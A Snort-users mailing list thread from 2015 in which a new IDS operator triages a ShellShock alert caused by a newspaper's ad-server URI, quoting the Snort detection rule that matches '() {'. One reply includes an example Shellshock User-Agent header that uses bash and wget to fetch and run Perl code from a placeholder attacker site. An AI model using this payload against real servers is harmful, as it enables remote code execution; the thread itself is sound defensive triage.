Re: ShellShock Signatures

[Colin Edwards <colin.p.edwards () gmail com>]

The URI that is being alerted on is
/ad/sacbee.jsp?loc=sbp_sbw_ros_ros_mediumbox&fmt=&fmtpos=
&keyw=&jsfuncstart=(function()%20{%20var%20adagioAsyncParams={%22ap%22:
true,%22ph%22:%22mainstage-free-html%22};&jsfunc=})();&
jsfuncno=//})();&rlp=&rnd=267194691727

That URI is in an HTTP GET request coming from the host inside our network,
and that GET happens immediately after browsing to sacbee.com.  After a
little more research, it looks like this is being caused by some Ad server
running on their web server, and it's not trying to execute any shell
commands.

At the moment, we're using the base policy "Balanced Security and
Connectivity", and have not made any modifications to it.  So, the rule for
1:31977 is:
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"OS-OTHER Bash
CGI environment variable injection attempt"; flow:to_server,established;
content:"() {"; fast_pattern:only; http_uri; metadata:policy balanced-ips
drop, policy security-ips drop, ruleset community, service http;
reference:cve,2014-6271; reference:cve,2014-6277; reference:cve,2014-6278;
reference:cve,2014-7169; classtype:attempted-admin; sid:31977; rev:4; )

It's pretty clear that "() {" is in the URI, so that makes sense why it
triggered.  I'm a little unclear on $EXTERNAL_NET vs $HOME_NET right now,
and why the rule is triggered on the outbound traffic (although it is good
to know there's no malicious traffic originating from our network).  I need
to look into that...maybe something we missed during initial configuration.

The pcap of the packet that generated the alert is attached.

Thanks,
Colin


On Tue, Mar 3, 2015 at 11:57 AM, Joel Esler (jesler) <jesler () cisco com>
wrote:

>  We made a blog post back when this came out on the details of the
> vulnerability here:
>
>  http://vrt-blog.snort.org/2014/09/shellshock-update-bash-immediately.html
>
>
>  --
> *Joel Esler*
> Open Source Manager
> Threat Intelligence Team Lead
> Talos Group
>
>   On Mar 3, 2015, at 11:37 AM, s0ups . <ynots0ups () gmail com> wrote:
>
>   On Mon, Mar 2, 2015 at 8:54 PM, Colin Edwards <colin.p.edwards () gmail com
> > wrote:
>
> > Hello Snort Users,
> >
> >  I'm a new list member, and happy to say that I've been working with
> > Firesight and a couple of ASA-X Firepower modules for almost a week now.
> > This is my first time hands-on w/ an IPS/IDS.  I'm here because I found
> > this message from this list while researching an alert:
> > http://sourceforge.net/p/snort/mailman/message/32980285/ .  I had a user
> > viewing a newspaper's website today, and I received an alert for 1:31977.
> > I actually wasn't familiar with the domain name, and just searching for the
> > domain I saw in the alert in Google also generated an alert from my
> > workstation (I assume something to do with Google pulling news/images to
> > display in the results?).  The URI from the request does have "() {" in it,
> > so that's why it was triggered, but I don't know if it's a False Positive
> > alert.  The website was for the Sacramento Bee (www.sacbee.com).  I can
> > provide more detail from the pcap / URI when I'm back in the office
> > tomorrow.
> >
> >
> >  While I'm introducing myself as a snort newbie...If anyone has any
> > recommendations for other resources or reading material, feel free to
> > message me off-list.
> >
> >  Cheers,
> > Colin Edwards
> > CISSP, GCIH, GCWN, GSEC, MCSE
>  Yo Colin,
>
> As you probably know, Shellshock attacks attempt to exploit environment
> variables that use user-provided data. The attacks are pretty easy to
> identify as they usually have some recognizable commands after the "() {
> :;};". I've actually hardly, if ever, see 1:31977 in my environment as the
> majority of the legit hits I see target HTTP header fields (so 1:31978 is
> more common) like so:
>      GET /cgi-bin/possiblevulnerablescript.cgi
>      User-Agent: () { :;}; /bin/bash -c "cd /var/tmp;wget
> http://attackerwebsite/maliciousperlcode;perl maliciousperlcode
>
> Fireeye has a good explanation and illustration of the various attack
> methods seen for the Shellshock vulnerability which will give you a good
> idea on what the common attacks look like. (
> https://www.fireeye.com/blog/threat-research/2014/09/shellshock-in-the-wild.html
> )
>
>  Chances are if it's an HTTP response from an external webserver to a
> client browser than it's a FP and poses little to no threat. I'd be
> interested in checking out the URI if you want to send it to me.
>
>  - s0ups
>
> On Mon, Mar 2, 2015 at 8:54 PM, Colin Edwards <colin.p.edwards () gmail com>
> wrote:
>
> > Hello Snort Users,
> >
> >  I'm a new list member, and happy to say that I've been working with
> > Firesight and a couple of ASA-X Firepower modules for almost a week now.
> > This is my first time hands-on w/ an IPS/IDS.  I'm here because I found
> > this message from this list while researching an alert:
> > http://sourceforge.net/p/snort/mailman/message/32980285/ .  I had a user
> > viewing a newspaper's website today, and I received an alert for 1:31977.
> > I actually wasn't familiar with the domain name, and just searching for the
> > domain I saw in the alert in Google also generated an alert from my
> > workstation (I assume something to do with Google pulling news/images to
> > display in the results?).  The URI from the request does have "() {" in it,
> > so that's why it was triggered, but I don't know if it's a False Positive
> > alert.  The website was for the Sacramento Bee (www.sacbee.com).  I can
> > provide more detail from the pcap / URI when I'm back in the office
> > tomorrow.
> >
> >
> >  While I'm introducing myself as a snort newbie...If anyone has any
> > recommendations for other resources or reading material, feel free to
> > message me off-list.
> >
> >  Cheers,
> > Colin Edwards
> > CISSP, GCIH, GCWN, GSEC, MCSE
> >
> >
> > ------------------------------------------------------------------------------
> > Dive into the World of Parallel Programming The Go Parallel Website,
> > sponsored
> > by Intel and developed in partnership with Slashdot Media, is your hub
> > for all
> > things parallel software development, from weekly thought leadership
> > blogs to
> > news, videos, case studies, tutorials and more. Take a look and join the
> > conversation now. http://goparallel.sourceforge.net/
> > _______________________________________________
> > Snort-users mailing list
> > Snort-users () lists sourceforge net
> > Go to this URL to change user options or unsubscribe:
> > https://lists.sourceforge.net/lists/listinfo/snort-users
> > Snort-users list archive:
> > http://sourceforge.net/mailarchive/forum.php?forum_name=snort-users
> >
> > Please visit http://blog.snort.org to stay current on all the latest
> > Snort news!
>
>
> ------------------------------------------------------------------------------
> Dive into the World of Parallel Programming The Go Parallel Website,
> sponsored
> by Intel and developed in partnership with Slashdot Media, is your hub for
> all
> things parallel software development, from weekly thought leadership blogs
> to
> news, videos, case studies, tutorials and more. Take a look and join the
> conversation now.
> http://goparallel.sourceforge.net/_______________________________________________
> Snort-users mailing list
> Snort-users () lists sourceforge net
> Go to this URL to change user options or unsubscribe:
> https://lists.sourceforge.net/lists/listinfo/snort-users
> Snort-users list archive:
> http://sourceforge.net/mailarchive/forum.php?forum_name=snort-users
>
> Please visit http://blog.snort.org to stay current on all the latest
> Snort news!

Attachment: packet.pcap
Description:

------------------------------------------------------------------------------
Dive into the World of Parallel Programming The Go Parallel Website, sponsored
by Intel and developed in partnership with Slashdot Media, is your hub for all
things parallel software development, from weekly thought leadership blogs to
news, videos, case studies, tutorials and more. Take a look and join the 
conversation now. http://goparallel.sourceforge.net/

_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://sourceforge.net/mailarchive/forum.php?forum_name=snort-users

Please visit http://blog.snort.org to stay current on all the latest Snort news!